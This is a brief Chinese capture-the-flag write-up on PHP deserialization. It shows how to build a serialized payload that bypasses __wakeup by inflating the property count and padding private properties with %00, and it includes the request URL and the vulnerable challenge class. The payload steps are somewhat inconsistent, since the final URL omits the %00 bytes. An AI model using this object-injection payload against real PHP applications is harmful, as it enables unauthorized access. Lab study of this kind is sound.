反序列化 私有属性 绕过__wakeup__

反序列化 私有属性 绕过__wakeup__

1 生成序列化payload的代码

<?php
class Name{
public $username = 'admin';
public $password = 100;

public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$n=new Name('admin',100);
echo serialize($n);
?>

2 手工修改payload

2.1 原始序列化的类

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

2.2 将属性的数量设置为大于真实属性数，可以绕过wakeup函数，PHP5 < 5.6.25，PHP7 < 7.0.10

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

2.3 原始序列化的类，私有属性会在类名和属性名前加%00，复制时会丢失，所以该处手工加上

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

2.4 发送payload

http://035b9a35-d2a2-4489-81ae-1a031d8a5631.node4.buuoj.cn:81/index.php?select=O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

3 原始题目类代码

<?php

class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}

function __wakeup(){
$this->username = 'guest';
}

function __destruct(){
if ($this->password != 100) {
echo "
NO!!!hacker!!!
";
echo "You name is: ";
echo $this->username;echo "
";
echo "You password is: ";
echo $this->password;echo "
";
die();
}
if ($this->username === 'admin') {

echo 66666;
}else{
echo "
hello my friend~~
sorry i can't give you the flag!";
die();

}
}
}
?>